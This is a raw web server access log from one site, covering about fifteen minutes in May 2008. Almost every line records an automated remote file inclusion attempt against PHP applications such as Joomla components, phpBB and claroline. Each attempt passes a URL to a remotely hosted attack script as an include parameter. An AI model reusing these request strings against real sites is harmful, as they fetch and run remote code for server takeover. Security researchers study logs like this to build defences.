65.87.22.58 - - [29/May/2008:10:24:26 -0700] "GET /logs/access_080418.log//citywriter/head.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:24:47 -0700] "GET /logs/access_080106.log//claroline/tracking/userLog.php?rootSys=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:24:47 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:24:47 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:24:47 -0700] "GET /logs/access_080106.log//claroline/phpbb/page_tail.php?includePath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:24:48 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:24:48 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:10:25:02 -0700] "GET /logs//citywriter/head.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:10:25:03 -0700] "GET //citywriter/head.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.189.26.170 - - [29/May/2008:10:25:36 -0700] "GET /logs/index.php?get=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.189.26.170 - - [29/May/2008:10:25:37 -0700] "GET /index.php?get=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:10:25:47 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.86.101.159 - - [29/May/2008:10:25:49 -0700] "GET /logs/access_080125.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.86.101.159 - - [29/May/2008:10:25:49 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:10:27:06 -0700] "GET /logs/access_071213.log//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:10:27:06 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:10:27:26 -0700] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:10:27:31 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.125.252.82 - - [29/May/2008:10:27:41 -0700] "GET /logs/access_071213.log//classes/adodbt/sql.php?classes_dir=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:10:27:45 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:10:27:57 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:10:27:58 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.252.82 - - [29/May/2008:10:28:02 -0700] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:10:28:06 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [29/May/2008:10:28:18 -0700] "GET /logs/access_080209.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [29/May/2008:10:28:18 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [29/May/2008:10:28:19 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:28:26 -0700] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:28:27 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:10:28:35 -0700] "GET /logs/access_080216.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:10:28:35 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:10:28:36 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.72.119.227 - - [29/May/2008:10:29:01 -0700] "GET //index.php?pagina=http://imanicm.com/webcalendar/includes/readme? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:29:26 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:29:28 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:29:29 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.21.47 - - [29/May/2008:10:29:44 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.186 - - [29/May/2008:10:29:44 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.136.6.38 - - [29/May/2008:10:29:49 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
193.136.6.38 - - [29/May/2008:10:29:50 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
193.136.6.38 - - [29/May/2008:10:29:50 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
193.136.6.38 - - [29/May/2008:10:29:54 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
193.136.6.38 - - [29/May/2008:10:29:54 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:10:30:25 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:10:30:26 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:31:16 -0700] "GET /logs/access_080228.log/xGB.php?act=admin&do=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:31:17 -0700] "GET /xGB.php?act=admin&do=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:31:17 -0700] "GET /logs/xGB.php?act=admin&do=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:10:31:22 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:10:31:23 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:31:48 -0700] "GET /logs/access_080211.log/xGB.php?act=admin&do=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.220 - - [29/May/2008:10:32:15 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:32:16 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:32:17 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:32:17 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.220 - - [29/May/2008:10:32:18 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [29/May/2008:10:32:19 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:32:20 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.94.38.182 - - [29/May/2008:10:32:29 -0700] "GET /logs/access_080106.log//skin/zero_vote/error.php?dir=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.94.38.182 - - [29/May/2008:10:32:30 -0700] "GET //skin/zero_vote/error.php?dir=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.94.38.182 - - [29/May/2008:10:32:30 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:10:32:31 -0700] "GET /logs/access_080109.log//index.php?abs_path=http://www.mailboxfilter.org/rss/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:10:32:34 -0700] "GET //index.php?abs_path=http://www.mailboxfilter.org/rss/ids.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:10:32:34 -0700] "GET /logs//index.php?abs_path=http://www.mailboxfilter.org/rss/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:33:06 -0700] "GET /xGB.php?act=admin&do=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:10:33:16 -0700] "GET /logs/access_080418.log//citywriter/head.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:33:54 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:34:02 -0700] "GET /logs/access_080418.log//phphtml.php?htmlclass_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:34:03 -0700] "GET //phphtml.php?htmlclass_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:34:03 -0700] "GET /logs//phphtml.php?htmlclass_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:34:50 -0700] "GET /logs/access_080331.log//phphtml.php?htmlclass_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:10:34:56 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:10:34:57 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:36:00 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:36:01 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:36:01 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.231.171.70 - - [29/May/2008:10:36:08 -0700] "GET /logs/admin_styles.php?phpbb_root_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.231.171.70 - - [29/May/2008:10:36:09 -0700] "GET /admin_styles.php?phpbb_root_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:10:36:39 -0700] "GET /logs/access_080212.log//index.php?abs_path=http://www.mailboxfilter.org/rss/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:37:00 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:37:00 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:37:00 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:10:37:02 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:10:37:03 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.17.103.109 - - [29/May/2008:10:37:23 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.103.109 - - [29/May/2008:10:37:23 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [29/May/2008:10:37:30 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:10:37:40 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:10:37:40 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:37:44 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.106.28.93 - - [29/May/2008:10:37:46 -0700] "GET /logs/access_080211.log/classes/adodbt/sql.php?classes_dir=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.28.93 - - [29/May/2008:10:37:46 -0700] "GET /logs/classes/adodbt/sql.php?classes_dir=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.28.93 - - [29/May/2008:10:37:55 -0700] "GET /logs/access_080117.log/classes/adodbt/sql.php?classes_dir=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:10:37:58 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:10:37:58 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.88.10 - - [29/May/2008:10:37:59 -0700] "GET /logs/access_080320.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:10:38:01 -0700] "GET /logs/access.log/main.php?x=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:10:38:07 -0700] "GET /main.php?x=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:10:38:12 -0700] "GET /logs/main.php?x=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:38:19 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:38:21 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:38:22 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:38:34 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.119.139.78 - - [29/May/2008:10:39:28 -0700] "GET /logs/access_080310.log/index1.php?choix=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.119.139.78 - - [29/May/2008:10:39:28 -0700] "GET /logs/access_080207.log/index1.php?choix=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.119.139.78 - - [29/May/2008:10:39:28 -0700] "GET /logs/index1.php?choix=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.119.139.78 - - [29/May/2008:10:39:28 -0700] "GET /index1.php?choix=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.119.139.78 - - [29/May/2008:10:39:38 -0700] "GET /logs/access_071230.log/index1.php?choix=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:39:41 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:39:42 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.131 - - [29/May/2008:10:40:05 -0700] "GET /logs/scripts.log//index.php?error=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.103.131 - - [29/May/2008:10:40:12 -0700] "GET //index.php?error=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.103.131 - - [29/May/2008:10:40:13 -0700] "GET /logs//index.php?error=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.33.45 - - [29/May/2008:10:40:13 -0700] "GET /logs/access_080320.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [29/May/2008:10:40:13 -0700] "GET /logs/access_080320.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:10:40:14 -0700] "GET /logs/access_080412.log/main.php?site=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
